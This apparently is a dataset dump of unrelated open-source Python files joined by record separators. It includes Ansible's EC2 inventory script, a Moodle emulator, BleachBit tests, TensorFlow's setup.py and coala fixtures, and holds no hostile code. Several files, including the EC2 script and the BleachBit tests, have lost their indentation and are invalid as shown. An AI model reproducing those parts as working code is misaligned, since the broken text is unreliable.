'ignored_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'interesting_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'new_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'questions_per_page': ('django.db.models.fields.SmallIntegerField', [], {'default': '10'}),
'real_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'reputation': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'seen_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'show_country': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'silver': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'w'", 'max_length': '2'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'student.registration': {
'Meta': {'object_name': 'Registration', 'db_table': "'auth_registration'"},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.userprofile': {
'Meta': {'object_name': 'UserProfile', 'db_table': "'auth_userprofile'"},
'courseware': ('django.db.models.fields.CharField', [], {'default': "'course.xml'", 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'meta': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
}
}
complete_apps = ['student'] | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
import sys
import os
'''
EC2 external inventory script
=================================
Generates inventory that Ansible can understand by making API request to
AWS EC2 using the Boto library.
NOTE: This script assumes Ansible is being executed where the environment
variables needed for Boto have already been set:
export AWS_ACCESS_KEY_ID='AK123'
export AWS_SECRET_ACCESS_KEY='abc123'
If you're using eucalyptus you need to set the above variables and
you need to define:
export EC2_URL=http://hostname_of_your_cc:port/services/Eucalyptus
For more details, see: http://docs.pythonboto.org/en/latest/boto_config_tut.html
When run against a specific host, this script returns the following variables:
- ec2_ami_launch_index
- ec2_architecture
- ec2_association
- ec2_attachTime
- ec2_attachment
- ec2_attachmentId
- ec2_client_token
- ec2_deleteOnTermination
- ec2_description
- ec2_deviceIndex
- ec2_dns_name
- ec2_eventsSet
- ec2_group_name
- ec2_hypervisor
- ec2_id
- ec2_image_id
- ec2_instanceState
- ec2_instance_type
- ec2_ipOwnerId
- ec2_ip_address
- ec2_item
- ec2_kernel
- ec2_key_name
- ec2_launch_time
- ec2_monitored
- ec2_monitoring
- ec2_networkInterfaceId
- ec2_ownerId
- ec2_persistent
- ec2_placement
- ec2_platform
- ec2_previous_state
- ec2_private_dns_name
- ec2_private_ip_address
- ec2_publicIp
- ec2_public_dns_name
- ec2_ramdisk
- ec2_reason
- ec2_region
- ec2_requester_id
- ec2_root_device_name
- ec2_root_device_type
- ec2_security_group_ids
- ec2_security_group_names
- ec2_shutdown_state
- ec2_sourceDestCheck
- ec2_spot_instance_request_id
- ec2_state
- ec2_state_code
- ec2_state_reason
- ec2_status
- ec2_subnet_id
- ec2_tenancy
- ec2_virtualization_type
- ec2_vpc_id
These variables are pulled out of a boto.ec2.instance object. There is a lack of
consistency with variable spellings (camelCase and underscores) since this
just loops through all variables the object exposes. It is preferred to use the
ones with underscores when multiple exist.
In addition, if an instance has AWS Tags associated with it, each tag is a new
variable named:
- ec2_tag_[Key] = [Value]
Security groups are comma-separated in 'ec2_security_group_ids' and
'ec2_security_group_names'.
'''
# (c) 2012, Peter Sankauskas
#
# This file is part of Ansible,
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
######################################################################
import sys
import os
import argparse
import re
from time import time
import boto
from boto import ec2
import ConfigParser
try:
import json
except ImportError:
import simplejson as json
class Ec2Inventory(object):
def __init__(self):
''' Main execution path '''
# Inventory grouped by instance IDs, tags, security groups, regions,
# and availability zones
self.inventory = {}
# Index of hostname (address) to instance ID
self.index = {}
# Read settings and parse CLI arguments
self.parse_cli_args()
self.read_settings()
# Cache
if self.args.refresh_cache:
self.do_api_calls_update_cache()
elif not self.is_cache_valid():
self.do_api_calls_update_cache()
# Data to print
if self.args.host:
data_to_print = self.get_host_info()
elif self.args.list:
# Display list of instances for inventory
if len(self.inventory) == 0:
data_to_print = self.get_inventory_from_cache()
else:
data_to_print = self.json_format_dict(self.inventory, True)
print data_to_print
def is_cache_valid(self):
''' Determines if the cache files have expired, or if it is still valid '''
if os.path.isfile(self.cache_path_cache):
mod_time = os.path.getmtime(self.cache_path_cache)
current_time = time()
if (mod_time + self.cache_max_age) > current_time:
if os.path.isfile(self.cache_path_index):
return True
return False
def read_settings(self):
''' Reads the settings from the ec2.ini file '''
config = ConfigParser.SafeConfigParser()
config.read(self.args.inifile)
# is eucalyptus?
self.eucalyptus_host = None
self.eucalyptus = False
if config.has_option('ec2', 'eucalyptus'):
self.eucalyptus = config.getboolean('ec2', 'eucalyptus')
if self.eucalyptus and config.has_option('ec2', 'eucalyptus_host'):
self.eucalyptus_host = config.get('ec2', 'eucalyptus_host')
# Regions
self.regions = []
configRegions = config.get('ec2', 'regions')
if (configRegions == 'all'):
if self.eucalyptus_host:
self.regions.append(boto.connect_euca(host=self.eucalyptus_host).region.name)
else:
for regionInfo in ec2.regions():
self.regions.append(regionInfo.name)
else:
self.regions = configRegions.split(",")
# Destination addresses
self.destination_variable = config.get('ec2', 'destination_variable')
self.vpc_destination_variable = config.get('ec2', 'vpc_destination_variable')
# Cache related
cache_path = config.get('ec2', 'cache_path')
self.cache_path_cache = cache_path + "/ansible-ec2.cache"
self.cache_path_index = cache_path + "/ansible-ec2.index"
self.cache_max_age = config.getint('ec2', 'cache_max_age')
def parse_cli_args(self):
''' Command line argument processing '''
parser = argparse.ArgumentParser(description='Produce an Ansible Inventory file based on EC2')
parser.add_argument('--list', action='store_true', default=True,
help='List instances (default: True)')
parser.add_argument('--host', action='store',
help='Get all the variables about a specific instance')
parser.add_argument('--refresh-cache', action='store_true', default=False,
help='Force refresh of cache by making API requests to EC2 (default: False - use cache files)')
default_inifile = os.environ.get("ANSIBLE_EC2_INI", os.path.dirname(os.path.realpath(__file__))+'/ec2.ini')
parser.add_argument('--inifile', dest='inifile', help='Path to init script to use', default=default_inifile)
self.args = parser.parse_args()
def do_api_calls_update_cache(self):
''' Do API calls to each region, and save data in cache files '''
for region in self.regions:
self.get_instances_by_region(region)
self.write_to_cache(self.inventory, self.cache_path_cache)
self.write_to_cache(self.index, self.cache_path_index)
def get_instances_by_region(self, region):
''' Makes an AWS EC2 API call to the list of instances in a particular
region '''
try:
if self.eucalyptus:
conn = boto.connect_euca(host=self.eucalyptus_host)
conn.APIVersion = '2010-08-31'
else:
conn = ec2.connect_to_region(region)
reservations = conn.get_all_instances()
for reservation in reservations:
for instance in reservation.instances:
self.add_instance(instance, region)
except boto.exception.BotoServerError as e:
if not self.eucalyptus:
print "Looks like AWS is down again:"
print e
sys.exit(1)
def get_instance(self, region, instance_id):
''' Gets details about a specific instance '''
if self.eucalyptus:
conn = boto.connect_euca(self.eucalyptus_host)
conn.APIVersion = '2010-08-31'
else:
conn = ec2.connect_to_region(region)
reservations = conn.get_all_instances([instance_id])
for reservation in reservations:
for instance in reservation.instances:
return instance
def add_instance(self, instance, region):
''' Adds an instance to the inventory and index, as long as it is
addressable '''
# Only want running instances
if instance.state != 'running':
return
# Select the best destination address
if instance.subnet_id:
dest = getattr(instance, self.vpc_destination_variable)
else:
dest = getattr(instance, self.destination_variable)
if not dest:
# Skip instances we cannot address (e.g. private VPC subnet)
return
# Add to index
self.index[dest] = [region, instance.id]
# Inventory: Group by instance ID (always a group of 1)
self.inventory[instance.id] = [dest]
# Inventory: Group by region
self.push(self.inventory, region, dest)
# Inventory: Group by availability zone
self.push(self.inventory, instance.placement, dest)
# Inventory: Group by instance type
self.push(self.inventory, self.to_safe('type_' + instance.instance_type), dest)
# Inventory: Group by key pair
if instance.key_name:
self.push(self.inventory, self.to_safe('key_' + instance.key_name), dest)
# Inventory: Group by security group
try:
for group in instance.groups:
key = self.to_safe("security_group_" + group.name)
self.push(self.inventory, key, dest)
except AttributeError:
print 'Package boto seems a bit older.'
print 'Please upgrade boto >= 2.3.0.'
sys.exit(1)
# Inventory: Group by tag keys
for k, v in instance.tags.iteritems():
key = self.to_safe("tag_" + k + "=" + v)
self.push(self.inventory, key, dest)
def get_host_info(self):
''' Get variables about a specific host '''
if len(self.index) == 0:
# Need to load index from cache
self.load_index_from_cache()
if not self.args.host in self.index:
# try updating the cache
self.do_api_calls_update_cache()
if not self.args.host in self.index:
# host migh not exist anymore
return self.json_format_dict({}, True)
(region, instance_id) = self.index[self.args.host]
instance = self.get_instance(region, instance_id)
instance_vars = {}
for key in vars(instance):
value = getattr(instance, key)
key = self.to_safe('ec2_' + key)
# Handle complex types
if type(value) in [int, bool]:
instance_vars[key] = value
elif type(value) in [str, unicode]:
instance_vars[key] = value.strip()
elif type(value) == type(None):
instance_vars[key] = ''
elif key == 'ec2_region':
instance_vars[key] = value.name
elif key == 'ec2_tags':
for k, v in value.iteritems():
key = self.to_safe('ec2_tag_' + k)
instance_vars[key] = v
elif key == 'ec2_groups':
group_ids = []
group_names = []
for group in value:
group_ids.append(group.id)
group_names.append(group.name)
instance_vars["ec2_security_group_ids"] = ','.join(group_ids)
instance_vars["ec2_security_group_names"] = ','.join(group_names)
else:
pass
# TODO Product codes if someone finds them useful
#print key
#print type(value)
#print value
return self.json_format_dict(instance_vars, True)
def push(self, my_dict, key, element):
''' Pushed an element onto an array that may not have been defined in
the dict '''
if key in my_dict:
my_dict[key].append(element)
else:
my_dict[key] = [element]
def get_inventory_from_cache(self):
''' Reads the inventory from the cache file and returns it as a JSON
object '''
cache = open(self.cache_path_cache, 'r')
json_inventory = cache.read()
return json_inventory
def load_index_from_cache(self):
''' Reads the index from the cache file sets self.index '''
cache = open(self.cache_path_index, 'r')
json_index = cache.read()
self.index = json.loads(json_index)
def write_to_cache(self, data, filename):
''' Writes data in JSON format to a file '''
json_data = self.json_format_dict(data, True)
cache = open(filename, 'w')
cache.write(json_data)
cache.close()
def to_safe(self, word):
''' Converts 'bad' characters in a string to underscores so they can be
used as Ansible groups '''
return re.sub("[^A-Za-z0-9\-]", "_", word)
def json_format_dict(self, data, pretty=False):
''' Converts a dict to a JSON object and dumps it as a formatted
string '''
if pretty:
return json.dumps(data, sort_keys=True, indent=2)
else:
return json.dumps(data)
# Run the script
Ec2Inventory() | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
# encoding: utf-8
"""Class to spin up a headless browser to handle Moodle interaction
"""
from mechanize import Browser, CookieJar
from bs4 import BeautifulSoup
from moodlefuse.exception import throws_moodlefuse_error
from moodlefuse.moodle.emulator.emulator import Emulator
from moodlefuse.moodle.resources import resource_errors
from moodlefuse.moodle.courses import course_errors
from moodlefuse.moodle import exception, attributes
from moodlefuse.core import config
from moodlefuse import moodle
class CoreEmulator(Emulator):
def __init__(self, username, password):
super(CoreEmulator, self).__init__(username, password)
self.setup_emulator()
def setup_emulator(self):
self.browser = Browser()
self.browser.set_handle_robots(False)
self.browser.addheaders = moodle.USER_AGENT
self.cookiejar = CookieJar()
self.browser.set_cookiejar(self.cookiejar)
def session_expired(self):
return self.browser.geturl().endswith(moodle.LOGIN_LOCATION)
@throws_moodlefuse_error(exception.LoginException)
def login(self):
self.open_login_page(self.browser.open)
self.browser.select_form(
predicate=lambda form: form.attrs.get('id') == attributes.LOGIN
)
self.browser.form.set_value(self.username, name='username')
self.browser.form.set_value(self.password, name='password')
resp = self.browser.submit()
if resp.geturl().endswith(moodle.LOGIN_LOCATION):
raise Exception
@throws_moodlefuse_error(resource_errors.UnableToDownloadResource)
def download(self, destination, source):
source = str(source)
if not source.startswith('http://') and not source.startswith('file://'):
source = config['TEST_DATA'] + '/' + source
self.browser.retrieve(source, destination)
def open_link(self, url):
response = self.browser.open(url)
return BeautifulSoup(response.read())
def check_form_checkbox(self, checkboxname):
self.browser.find_control(checkboxname).items[0].selected = True
def uncheck_form_checkbox(self, checkboxname):
self.browser.find_control(checkboxname).items[0].selected = False
def add_form_content(self, inputname, content):
self.browser.form.set_value(content, name=inputname)
def close_form(self):
self.browser.submit()
def set_form_to_first_form(self):
self.browser.select_form(nr=0)
def set_form_to_form_with_control_value(self, value):
for form in self.browser.forms():
for control in form.controls:
if control.value == value:
self.browser.form = form
@throws_moodlefuse_error(exception.UnableToToggleEditing)
def turn_course_editing_on(self):
self.set_form_to_form_with_control_value(moodle.EDIT_ON_MOODLE_BUTTON_TEXT)
response = self.browser.submit()
return BeautifulSoup(response.read())
def _setup_assignments_for_parsing(self, submission_filter):
    """Configure the grading table for scraping and return the result page.

    Applies `submission_filter`, bumps the page size to 100, and disables
    quick grading so the submitted table parses cleanly.
    """
    self.set_form_to_form_with_control_value('Save and update table')
    self.browser.form["filter"] = [submission_filter]
    self.browser.form["perpage"] = ["100"]
    self.uncheck_form_checkbox('quickgrading')
    page = self.browser.submit()
    return BeautifulSoup(page.read())
def filter_assignment_submissions(self):
    """Show only the assignments that have been submitted."""
    return self._setup_assignments_for_parsing("submitted")
def unfilter_assignment_submissions(self):
    """Clear the submissions filter (show every assignment)."""
    return self._setup_assignments_for_parsing("")
@throws_moodlefuse_error(exception.UnableToToggleEditing)
def turn_course_editing_off(self):
    """Press Moodle's 'turn editing off' button and return the new page."""
    self.set_form_to_form_with_control_value(moodle.EDIT_OFF_MOODLE_BUTTON_TEXT)
    page = self.browser.submit()
    return BeautifulSoup(page.read())
@throws_moodlefuse_error(course_errors.InvalidMoodleIndex)
def get_courses(self):
    """Open the configured Moodle index page and return it parsed."""
    return self.open_link(config['MOODLE_INDEX_ADDRESS'])
@throws_moodlefuse_error(course_errors.UnableToObtainCategoryList)
def get_course_categories(self, url):
    """Open a course-category page at `url` and return it parsed."""
    return self.open_link(url)
@throws_moodlefuse_error(resource_errors.UnableToObtainResourceList)
def get_course_resource_names(self, url):
    """Open a course-resource page at `url` and return it parsed."""
    return self.open_link(url)
def close(self):
    """Shut down the emulated browser session."""
    self.browser.close()
# vim: ts=4:sw=4:expandtab
# -*- coding: UTF-8 -*-
# BleachBit
# Copyright (C) 2008-2015 Andrew Ziem
# http://bleachbit.sourceforge.net
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Test case for module Unix
"""
import os
import sys
import unittest
sys.path.append('.')
import bleachbit.Common
from bleachbit.Unix import *
class UnixTestCase(unittest.TestCase):
"""Test case for module Unix"""
def setUp(self):
"""Initialize unit tests"""
self.locales = Locales()
def test_apt_autoclean(self):
"""Unit test for method apt_autoclean()"""
if 0 != os.geteuid() or not FileUtilities.exe_exists('apt-get'):
self.assertRaises(RuntimeError, apt_autoclean)
else:
bytes_freed = apt_autoclean()
self.assert_(isinstance(bytes_freed, (int, long)))
def test_is_broken_xdg_desktop(self):
"""Unit test for is_broken_xdg_desktop()"""
menu_dirs = ['/usr/share/applications',
'/usr/share/autostart',
'/usr/share/gnome/autostart',
'/usr/share/gnome/apps',
'/usr/share/mimelnk',
'/usr/share/applnk-redhat/',
'/usr/local/share/applications/']
for dirname in menu_dirs:
for filename in [fn for fn in FileUtilities.children_in_directory(dirname, False)
if fn.endswith('.desktop')]:
self.assert_(type(is_broken_xdg_desktop(filename) is bool))
def test_is_running(self):
# Fedora 11 doesn't need realpath but Ubuntu 9.04 uses symlink
# from /usr/bin/python to python2.6
exe = os.path.basename(os.path.realpath(sys.executable))
self.assertTrue(is_running(exe))
def test_locale_to_language(self):
"""Unit test for locale_to_language()"""
tests = [('en', 'en'),
('en_US', 'en'),
('en_US@piglatin', 'en'),
('en_US.utf8', 'en'),
('klingon', 'klingon'),
('pl.ISO8859-2', 'pl'),
('sr_Latn', 'sr'),
('zh_TW.Big5', 'zh')]
for test in tests:
self.assertEqual(locale_to_language(test[0]), test[1])
self.assertRaises(ValueError, locale_to_language, 'default')
self.assertRaises(ValueError, locale_to_language, 'C')
self.assertRaises(ValueError, locale_to_language, 'English')
def test_locale_globex(self):
"""Unit test for locale_globex"""
locale = locale_globex('/bin/ls', '(ls)$').next()
self.assertEqual(locale, ('ls', '/bin/ls'))
fakepath = '/usr/share/omf/gedit/gedit-es.omf'
def test_yield(pathname, regex):
"""Replacement for globex()"""
yield fakepath
old_globex = FileUtilities.globex
FileUtilities.globex = test_yield
func = locale_globex('/usr/share/omf/*/*-*.omf', '-([a-z]{2}).omf$')
actual = func.next()
expect = ('es', fakepath)
self.assertEqual(
actual, expect, "Expected '%s' but got '%s'" % (expect, actual))
FileUtilities.globex = old_globex
def test_localization_paths(self):
"""Unit test for localization_paths()"""
from xml.dom.minidom import parseString
configpath = parseString(
'<path location="/usr/share/locale/" />').firstChild
locales.add_xml(configpath)
counter = 0
for path in locales.localization_paths(['en']):
self.assert_(os.path.lexists(path))
# self.assert_(path.startswith('/usr/share/locale'))
# /usr/share/locale/en_* should be ignored
self.assert_(path.find('/en_') == -1)
counter += 1
self.assert_(
counter > 0, 'Zero files deleted by localization cleaner. This may be an error unless you really deleted all the files.')
def test_native_name(self):
"""Unit test for native_name()"""
tests = [('en', 'English'),
('es', 'Español')]
for test in tests:
self.assertEqual(self.locales.native_name(test[0]), test[1])
def test_rotated_logs(self):
"""Unit test for rotated_logs()"""
for path in rotated_logs():
self.assert_(os.path.exists(path),
"Rotated log path '%s' does not exist" % path)
def test_start_with_computer(self):
"""Unit test for start_with_computer*"""
b = start_with_computer_check()
self.assert_(isinstance(b, bool))
if not os.path.exists(bleachbit.Common.launcher_path) and \
os.path.exists('bleachbit.desktop'):
# this happens when BleachBit is not installed
bleachbit.Common.launcher_path = 'bleachbit.desktop'
# opposite setting
start_with_computer(not b)
two_b = start_with_computer_check()
self.assert_(isinstance(two_b, bool))
self.assertEqual(b, not two_b)
# original setting
start_with_computer(b)
three_b = start_with_computer_check()
self.assert_(isinstance(b, bool))
self.assertEqual(b, three_b)
def test_wine_to_linux_path(self):
"""Unit test for wine_to_linux_path()"""
tests = [("/home/foo/.wine",
"C:\\Program Files\\NSIS\\NSIS.exe",
"/home/foo/.wine/drive_c/Program Files/NSIS/NSIS.exe")]
for test in tests:
self.assertEqual(wine_to_linux_path(test[0], test[1]), test[2])
def test_yum_clean(self):
"""Unit test for yum_clean()"""
if 0 != os.geteuid() or os.path.exists('/var/run/yum.pid') \
or not FileUtilities.exe_exists('yum'):
self.assertRaises(RuntimeError, yum_clean)
else:
bytes_freed = yum_clean()
self.assert_(isinstance(bytes_freed, (int, long)))
print 'debug: yum bytes cleaned %d', bytes_freed
def suite():
    """Build the unittest suite for this module."""
    return unittest.makeSuite(UnixTestCase)


# Only meaningful on POSIX systems (the module under test is Unix-specific).
if __name__ == '__main__' and 'posix' == os.name:
    unittest.main()
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import fnmatch
import os
import platform
import re
import sys
from setuptools import find_packages, setup, Command, Extension
from setuptools.command.install import install as InstallCommandBase
from setuptools.dist import Distribution
_VERSION = '0.10.0'

# There are bugs with numpy pip installation on OS X prior to 1.10.1,
# so on mac we require a higher version than on other platforms.
numpy_version = "1.10.1" if platform.system() == "Darwin" else "1.8.2"

REQUIRED_PACKAGES = [
    'numpy >= %s' % numpy_version,
    'six >= 1.10.0',
    'protobuf == 3.0.0b2',
]

# python3 requires wheel 0.26
if sys.version_info.major == 3:
    REQUIRED_PACKAGES.append('wheel >= 0.26')
else:
    REQUIRED_PACKAGES.append('wheel')
# mock comes with unittest.mock for python3; appended unconditionally here
# even though the note says it is only needed for python2 -- TODO confirm.
REQUIRED_PACKAGES.append('mock >= 2.0.0')

# pylint: disable=line-too-long
CONSOLE_SCRIPTS = [
    'tensorboard = tensorflow.tensorboard.tensorboard:main',
]
# pylint: enable=line-too-long

TEST_PACKAGES = [
    'scipy >= 0.15.1',
]
class BinaryDistribution(Distribution):
    """Distribution that always reports platform-specific contents."""

    def is_pure(self):
        # The wheel bundles a compiled extension, so it is never pure Python.
        return False
class InstallCommand(InstallCommandBase):
    """Override the dir where the headers go."""

    def finalize_options(self):
        result = InstallCommandBase.finalize_options(self)
        # Place headers under <purelib>/tensorflow/include so that a single
        # -I flag works for client code.
        self.install_headers = os.path.join(
            self.install_purelib, 'tensorflow', 'include')
        return result
class InstallHeaders(Command):
    """Override how headers are copied.

    The install_headers that comes with setuptools copies all files to
    the same directory. But we need the files to be in a specific directory
    hierarchy for -I <include_dir> to work correctly.
    """
    description = 'install C/C++ header files'

    user_options = [('install-dir=', 'd',
                     'directory to install header files to'),
                    ('force', 'f',
                     'force installation (overwrite existing files)'),
                    ]
    boolean_options = ['force']

    def initialize_options(self):
        """Set defaults before option parsing."""
        self.install_dir = None
        self.force = 0
        self.outfiles = []

    def finalize_options(self):
        """Inherit the destination and force flag from the install command."""
        self.set_undefined_options('install',
                                   ('install_headers', 'install_dir'),
                                   ('force', 'force'))

    def mkdir_and_copy_file(self, header):
        """Copy one header, preserving its directory hierarchy."""
        target_dir = os.path.join(self.install_dir, os.path.dirname(header))
        # Drop intervening protobuf source dirs so -I paths stay short.
        target_dir = re.sub('/google/protobuf/src', '', target_dir)
        if 'external/eigen_archive/' in target_dir:
            # Copy eigen code into tensorflow/include as well.  A symlink
            # would do, but the generated wheel ignores symlinks inside the
            # hierarchy, so the file is duplicated instead.
            extra_dir = target_dir.replace('external/eigen_archive', '')
            if not os.path.exists(extra_dir):
                self.mkpath(extra_dir)
            self.copy_file(header, extra_dir)
        if not os.path.exists(target_dir):
            self.mkpath(target_dir)
        return self.copy_file(header, target_dir)

    def run(self):
        """Copy every configured header into the install tree."""
        headers = self.distribution.headers
        if not headers:
            return
        self.mkpath(self.install_dir)
        for header in headers:
            (out, _) = self.mkdir_and_copy_file(header)
            self.outfiles.append(out)

    def get_inputs(self):
        return self.distribution.headers or []

    def get_outputs(self):
        return self.outfiles
def find_files(pattern, root):
    """Yield every file below `root` whose basename matches `pattern`."""
    for dirpath, _, filenames in os.walk(root):
        for name in fnmatch.filter(filenames, pattern):
            yield os.path.join(dirpath, name)
# Non-Python files vendored under external/ are shipped as package data.
matches = ['../' + x for x in find_files('*', 'external') if '.py' not in x]

# Headers bundled into tensorflow/include by InstallHeaders.
headers = (list(find_files('*.h', 'tensorflow/core')) +
           list(find_files('*.h', 'google/protobuf/src')) +
           list(find_files('*', 'third_party/eigen3')) +
           list(find_files('*', 'external/eigen_archive')))

setup(
    name='tensorflow',
    version=_VERSION,
    description='TensorFlow helps the tensors flow',
    long_description='',
    url='http://tensorflow.org/',
    author='Google Inc.',
    author_email='opensource@google.com',
    # Contained modules and scripts.
    packages=find_packages(),
    entry_points={
        'console_scripts': CONSOLE_SCRIPTS,
    },
    headers=headers,
    install_requires=REQUIRED_PACKAGES,
    tests_require=REQUIRED_PACKAGES + TEST_PACKAGES,
    # Add in any packaged data.
    include_package_data=True,
    package_data={
        'tensorflow': ['python/_pywrap_tensorflow.so',
                       'tensorboard/dist/index.html',
                       'tensorboard/dist/tf-tensorboard.html',
                       'tensorboard/lib/css/global.css',
                       'tensorboard/TAG',
                       ] + matches,
    },
    zip_safe=False,
    distclass=BinaryDistribution,
    cmdclass={
        'install_headers': InstallHeaders,
        'install': InstallCommand,
    },
    # PyPI package information.
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Intended Audience :: Education',
        'Intended Audience :: Science/Research',
        'License :: OSI Approved :: Apache Software License',
        'Programming Language :: Python :: 2.7',
        'Topic :: Scientific/Engineering :: Mathematics',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'Topic :: Software Development :: Libraries',
    ],
    license='Apache 2.0',
    keywords='tensorflow tensor machine learning',
)
"""A minimal subset of the locale module used at interpreter startup
(imported by the _io module), in order to reduce startup time.
Don't import directly from third-party code; use the `locale` module instead!
"""
import sys
import _locale
if sys.platform.startswith("win"):
def getpreferredencoding(do_setlocale=True):
return _locale._getdefaultlocale()[1]
else:
try:
_locale.CODESET
except AttributeError:
def getpreferredencoding(do_setlocale=True):
# This path for legacy systems needs the more complex
# getdefaultlocale() function, import the full locale module.
import locale
return locale.getpreferredencoding(do_setlocale)
else:
def getpreferredencoding(do_setlocale=True):
assert not do_setlocale
result = _locale.nl_langinfo(_locale.CODESET)
if not result and sys.platform == 'darwin':
# nl_langinfo can return an empty string
# when the setting has an invalid value.
# Default to UTF-8 in that case because
# UTF-8 is the default charset on OSX and
# returning nothing will crash the
# interpreter.
result = 'UTF-8'
return result | unknown | codeparrot/codeparrot-clean | ||
from coalib.bearlib.aspects import Taste, aspectclass
from coalib.bearlib.aspects.base import aspectbase
import pytest
@pytest.fixture
def RootAspect():
    """An exclusive Root aspectclass for unit tests."""
    class RootAspect(aspectbase, metaclass=aspectclass):
        parent = None
        _tastes = {}

    return RootAspect
@pytest.fixture
def SubAspect_tastes():
    """Taste definitions for an exclusive SubAspect class for unit tests."""
    saltiness = Taste[str]('The saltiness', ('high', 'low'), default='low')
    sweetness = Taste[int]('The sweetness', (1, 23, 45), default=23,
                           languages=('py', ))
    sourness = Taste[bool]('Is it sour?', (True, False), default=False)
    return {'salty': saltiness, 'sweet': sweetness, 'sour': sourness}
@pytest.fixture
def SubAspect_taste_values():
    """Concrete taste values for an exclusive SubAspect class for unit tests."""
    return dict(salty='high', sweet=45, sour=True)
@pytest.fixture
def SubAspect_docs():
    """Docs definitions for an exclusive SubAspect class for unit tests."""
    class docs:
        example = 'An example'
        example_language = 'The example language'
        importance_reason = 'The reason of importance'
        fix_suggestions = 'Suggestions for fixing'

    return docs
@pytest.fixture
def SubAspect(RootAspect, SubAspect_docs, SubAspect_tastes):
    """An exclusive SubAspect class for unit tests."""
    @RootAspect.subaspect
    class SubAspect:
        """
        Definition
        """
        docs = SubAspect_docs
        salty = SubAspect_tastes['salty']
        sweet = SubAspect_tastes['sweet']
        sour = SubAspect_tastes['sour']

    return SubAspect
@pytest.fixture
def SubSubAspect_tastes():
    """Taste definitions for an exclusive SubSubAspect class for unit tests."""
    saltiness = Taste[str]('The saltiness', ('high', 'low'), default='low')
    sweetness = Taste[int]('The sweetness', (1, 23, 45), default=23,
                           languages=('py', ))
    sourness = Taste[bool]('Is it sour?', (True, False), default=False)
    return {'salty': saltiness, 'sweet': sweetness, 'sour': sourness}
@pytest.fixture
def SubSubAspect_taste_values():
    """Concrete taste values for an exclusive SubSubAspect class for unit tests."""
    return dict(salty='high', sweet=45, sour=True)
@pytest.fixture
def SubSubAspect_docs():
    """Docs definitions for an exclusive SubSubAspect class for unit tests."""
    class docs:
        example = 'An example'
        example_language = 'The example language'
        importance_reason = 'The reason of importance'
        fix_suggestions = 'Suggestions for fixing'

    return docs
@pytest.fixture
